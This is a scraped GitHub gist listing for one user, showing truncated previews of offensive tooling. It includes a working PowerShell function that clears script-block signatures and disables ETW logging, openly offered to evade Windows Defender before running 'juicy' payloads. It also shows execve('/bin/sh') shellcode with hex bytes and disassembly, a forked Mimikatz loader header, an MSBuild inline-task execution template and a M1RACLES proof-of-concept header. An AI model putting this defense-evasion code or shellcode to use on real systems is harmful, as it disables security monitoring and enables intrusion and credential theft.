:shipit:
Wait, did I stream that out loud?

Aekr1_ //akrasia Aekras1a

/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.Devices;
using System;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace WindowsFormsApp8
{
@Aekras1a
Aekras1a / OneDoesNotSimplyBypassEntireWinDefender.ps1
Created May 3, 2021 22:07
Do you wanna bypass all AV features that will stop you from running your juicy-juicy powershell payload in only ONE script and without Administrator privileges? Then you're in the right place!
# this script can bypass all AV features that will stop you from running your juicy-juicy powershell payload REFLECTIVELY
# run this script before running your payload, and make sure that it's run in the same session!
# DON'T COMBINE THIS SCRIPT WITH YOUR PAYLOAD, OTHERWISE IT WILL NOT WORK!!!
# you don't need to invoke the function again!
function Invoke-OneDoesNotSimplyBypassEntireWinDefender {
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
$increment = 0
$maxincrement = 30000000
For ($increment=0; $increment -lt $maxincrement;$increment++) { $increment++ }
@Aekras1a
Aekras1a / Tasks.cs
Created December 27, 2019 13:07 — forked from Ridter/Tasks.cs
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
@Aekras1a
Aekras1a / messages.c
Created September 6, 2019 10:42 — forked from taviso/messages.c
Enumerating Windows Messages
#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#pragma comment(lib, "USER32")
FARPROC NtUserPostMessage;
BOOL CALLBACK QueryWindowMessageProc(HWND Window, LPARAM Param)
{
@Aekras1a
Aekras1a / execve.c
Created April 3, 2019 08:27 — forked from resilar/execve.c
Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
/*
* Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
* 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800
*
* - offset - bytes 32-bit code 64-bit code
* 0x00000000 31c0 xor eax, eax xor eax, eax
* 0x00000002 50 push eax push rax
* 0x00000003 48 dec eax rex.w
* 0x00000004 8b1424 mov edx, dword [esp] mov rdx, qword [rsp]
* 0x00000007 eb10 jmp 0x19 jmp 0x19

Keybase proof

I hereby claim:

  • I am aekras1a on github.
  • I am aekras1a (https://keybase.io/aekras1a) on keybase.
  • I have a public key ASDM8Wk6BCTdO4m_rBWpFk84AtPlaXjhjrperQ8nQ0cmoQo

To claim this, I am signing this object:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="NotSubTee">
<BusinessTime />
</Target>
<UsingTask
TaskName="BusinessTime"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>